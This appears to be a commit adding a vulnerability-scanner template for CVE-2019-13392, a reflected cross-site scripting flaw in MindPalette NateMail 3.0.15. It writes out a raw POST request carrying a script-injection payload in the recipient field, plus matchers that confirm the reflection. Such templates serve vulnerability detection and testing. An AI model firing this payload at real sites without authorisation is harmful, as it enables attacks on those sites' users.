Merge pull request #2678 from pikpikcu/patch-279

Create CVE-2019-13392.yaml
patch-1
Prince Chaddha 2021-09-16 22:27:05 +05:30 committed by GitHub
commit cc9b5ea32e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 34 additions and 0 deletions

View File

@ -0,0 +1,34 @@
id: CVE-2019-13392
info:
name: MindPalette NateMail 3.0.15 - (XSS)
author: pikpikcu
severity: medium
description: reflected Cross-Site Scripting (XSS) vulnerability in MindPalette NateMail 3.0.15 allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.
reference:
- https://www.doyler.net/security-not-included/natemail-vulnerabilities
- https://nvd.nist.gov/vuln/detail/CVE-2019-13392
tags: cves,cve2019,natemail,xss
requests:
- raw:
- |
POST /NateMail.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
recipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html